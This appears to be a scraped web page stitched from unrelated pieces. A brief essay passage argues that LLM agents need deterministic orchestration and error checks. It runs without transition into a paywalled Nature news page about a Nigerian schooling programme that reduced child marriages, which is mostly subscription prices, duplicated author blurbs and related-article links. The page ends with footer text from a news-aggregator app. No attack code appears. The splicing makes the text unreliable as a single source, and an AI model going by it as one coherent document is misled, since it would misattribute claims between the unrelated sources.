Software scales through re­cur­sive com­pos­abil­ity: sys­tems built from li­braries, mod­ules, and func­tions. It’s code all the way down. Code ex­poses pre­dictable be­hav­ior, en­abling lo­cal rea­son­ing. Prompt chains lack this prop­erty. While use­ful for nar­row tasks, prompts are non-de­ter­min­is­tic, weakly spec­i­fied, and dif­fi­cult to ver­ify.

Reliability re­quires mov­ing logic out of prose and into run­time. We need de­ter­min­is­tic scaf­folds: ex­plicit state tran­si­tions and val­i­da­tion check­points that treat the LLM as a com­po­nent, not the sys­tem.

But de­ter­min­is­tic or­ches­tra­tion is only half the bat­tle. In a sys­tem prone to silent fail­ure, an agent with­out ag­gres­sive er­ror de­tec­tion is just a fast way to reach the wrong con­clu­sion. Without pro­gram­matic ver­i­fi­ca­tion, we are left with three op­tions:

Babysitter: Keep a hu­man in the loop to catch er­rors be­fore they prop­a­gate.

Auditor: Perform ex­haus­tive end-to-end ver­i­fi­ca­tion af­ter the run.

Prayer: Vibe ac­cept the out­puts.

Child marriages plunged when girls stayed in school in Nigeria

www.nature.com

NEWS

11 March 2026

Collaboration be­tween re­searchers and re­li­gious lead­ers led to a cut in the like­li­hood of early mar­riage by 80%.

By

Mariana Lenharo0

Mariana Lenharo

Mariana Lenharo is a re­porter for Nature in New York City.

View au­thor pub­li­ca­tions

Search au­thor on: PubMed Google Scholar

Mariana Lenharo is a re­porter for Nature in New York City.

Mariana Lenharo is a re­porter for Nature in New York City.

View au­thor pub­li­ca­tions

Search au­thor on: PubMed Google Scholar

Email

Bluesky

Facebook

LinkedIn

Reddit

Whatsapp

X

Access through your in­sti­tu­tion

Buy or sub­scribe

An ed­u­ca­tional pro­gramme for young girls in north­ern Nigeria that in­volved lo­cal re­li­gious lead­ers mas­sively re­duced the num­ber of child mar­riages, a study re­ported in Nature to­day has found1.

Access op­tions

Access through your in­sti­tu­tion

Access Nature and 54 other Nature Portfolio jour­nals

Get Nature+, our best-value on­line-ac­cess sub­scrip­tion

$32.99 / 30 days

can­cel any time

Learn more

Subscribe to this jour­nal

Receive 51 print is­sues and on­line ac­cess

$199.00 per year

only $3.90 per is­sue

Learn more

Rent or buy this ar­ti­cle

Prices vary by ar­ti­cle type

from$1.95

to$39.95

Learn more

Prices may be sub­ject to lo­cal taxes which are cal­cu­lated dur­ing check­out

Additional ac­cess op­tions:

Log in

Learn about in­sti­tu­tional sub­scrip­tions

Read our FAQs

Contact cus­tomer sup­port

doi: https://​doi.org/​10.1038/​d41586 – 026-00796 – 2

Read the as­so­ci­ated Policy Brief: Marriage of ado­les­cent girls in Nigeria re­duced by 80% by big push’ in­ter­ven­tion’.

References

Cohen, I., Abubakar, M. & Perlman, D. Nature https://​doi.org/​10.1038/​s41586 – 026-10206 – 2 (2026).Article

Google Scholar

Cohen, I., Abubakar, M. & Perlman, D. Nature https://​doi.org/​10.1038/​s41586 – 026-10206 – 2 (2026).

Article

Google Scholar

Download ref­er­ences

Reprints and per­mis­sions

Subjects

Education

Developing world

Law

Latest on:

Education

Developing world

Law

Meet the aca­d­e­mics re­fus­ing to use gen­er­a­tive AI Career Feature 05 MAY 26

Meet the aca­d­e­mics re­fus­ing to use gen­er­a­tive AI

Career Feature 05 MAY 26

Racial di­ver­sity in higher ed­u­ca­tion is as­so­ci­ated with higher stu­dent salaries Article 29 APR 26

Racial di­ver­sity in higher ed­u­ca­tion is as­so­ci­ated with higher stu­dent salaries

Article 29 APR 26

How to im­press the Nature Awards judges Spotlight 22 APR 26

How to im­press the Nature Awards judges

Spotlight 22 APR 26

Pollinators sup­port the nu­tri­tion and in­come of vul­ner­a­ble com­mu­ni­ties Article 06 MAY 26

Pollinators sup­port the nu­tri­tion and in­come of vul­ner­a­ble com­mu­ni­ties

Article 06 MAY 26

Machine learn­ing im­proves health-care ac­cess in Sierra Leone News & Views 29 APR 26

Machine learn­ing im­proves health-care ac­cess in Sierra Leone

News & Views 29 APR 26

Improving ac­cess to es­sen­tial med­i­cines via de­ci­sion-aware ma­chine learn­ing Article 29 APR 26

Improving ac­cess to es­sen­tial med­i­cines via de­ci­sion-aware ma­chine learn­ing

Article 29 APR 26

OpenAI is un­der crim­i­nal in­ves­ti­ga­tion — why chat­bots don’t al­ways fol­low the law News Explainer 07 MAY 26

OpenAI is un­der crim­i­nal in­ves­ti­ga­tion — why chat­bots don’t al­ways fol­low the law

News Explainer 07 MAY 26

Racial di­ver­sity in higher ed­u­ca­tion is as­so­ci­ated with higher stu­dent salaries Article 29 APR 26

Racial di­ver­sity in higher ed­u­ca­tion is as­so­ci­ated with higher stu­dent salaries

Article 29 APR 26

Academics de­mand apol­ogy for sci­en­tist in­ves­ti­gated for China ties but never charged Career News 23 APR 26

Academics de­mand apol­ogy for sci­en­tist in­ves­ti­gated for China ties but never charged

Career News 23 APR 26

Jobs

Full Professorship (W3) for Proteomics and Translational Biomarkers- (f/m/d)

The Medical Faculty Mannheim of Heidelberg University offers the po­si­tion of a   Full Professorship (W3) for Proteomics and Translational Biomarke… Mannheim, Baden-Württemberg (DE) Medizinische Fakultät Mannheim der Universität Heidelberg

Full Professorship (W3) for Proteomics and Translational Biomarkers- (f/m/d)

The Medical Faculty Mannheim of Heidelberg University offers the po­si­tion of a   Full Professorship (W3) for Proteomics and Translational Biomarke…

Mannheim, Baden-Württemberg (DE)

Medizinische Fakultät Mannheim der Universität Heidelberg

Sir Run Run Shaw Hospital, School of Medicine, Zhejiang University, Warmly Welcomes Talents Abroad

Qiushi Chair Professor; Qiushi Distinguished Scholar; ZJU 100 Young Researcher; Distinguished re­searcher No. 3, Qingchun East Road, Hangzhou, Zhejiang (CN) Sir Run Run Shaw Hospital Affiliated with Zhejiang University School of Medicine

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

Visit pancik.com for more.